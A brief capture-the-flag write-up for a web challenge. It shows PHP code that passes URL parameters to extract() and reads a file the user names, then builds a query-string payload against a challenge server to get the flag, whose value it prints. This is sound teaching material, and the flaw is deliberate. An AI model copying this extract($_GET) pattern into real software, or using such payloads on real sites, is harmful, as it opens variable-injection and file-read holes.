0. Open the web page and view the PHP source code
Title description: txt? ? ? ?
<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>1. Analyze the code
Combine the title prompt txt? ? ? , And file_get_contents(), a function that reads the contents of a file
There may be a file flag.txt
2. Open flag.txt and view the contents of the file
bugku, from this we know that the variable f is bugku
if ($ac === $f) output flag, just let ac==bugku
3、构造payload:http://114.67.246.176:18068?ac=bugku&&fn=flag.txt
4. Get the flag: flag{20da9eeb08f97e7e86bbf2be25d6e9dc}